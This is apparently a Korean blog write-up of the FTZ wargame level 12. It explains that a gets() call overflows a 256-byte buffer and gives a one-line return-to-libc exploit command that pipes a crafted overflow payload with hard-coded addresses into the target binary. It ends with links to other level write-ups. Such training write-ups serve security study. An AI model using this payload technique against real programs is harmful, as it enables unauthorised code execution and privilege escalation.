level11이랑 거의 똑같다.
이번엔 level11처럼 argv로 입력받는 방식이 아닌 gets로 입력받는다.
gets에서 버퍼오버플로우가 터지므로 level11과 비슷하게 익스 짜주면 된다.
해당 문제도 마찬가지로 str[256] + dummy[8] + sfp[4] + ret[4] 로 구성되어 있으므로
(python -c 'print "A"*268 + "\xc0\xf2\x03\x42" + "AAAA" + "\xa4\x7e\x12\x42"';cat) | ./attackme
마찬가지로 ASLR 기법이 걸려있으므로 RTL 기법으로 문제를 풀었다.
'Pwnable > ▷ Study' 카테고리의 다른 글
ftz level16 (0) | 2018.02.17 |
---|---|
ftz level15 (0) | 2018.02.17 |
ftz level14 (0) | 2018.02.17 |
ftz level13 (0) | 2018.02.17 |
ftz level11 (0) | 2018.02.17 |